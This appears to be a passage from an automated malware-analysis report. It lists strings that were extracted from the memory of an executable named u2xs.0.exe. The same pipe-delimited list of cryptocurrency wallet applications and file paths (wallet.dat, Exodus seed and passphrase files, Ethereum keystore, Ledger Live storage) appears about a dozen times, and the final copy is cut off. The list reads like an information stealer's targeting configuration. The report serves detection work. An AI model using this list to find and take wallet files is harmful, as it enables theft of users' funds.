Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local 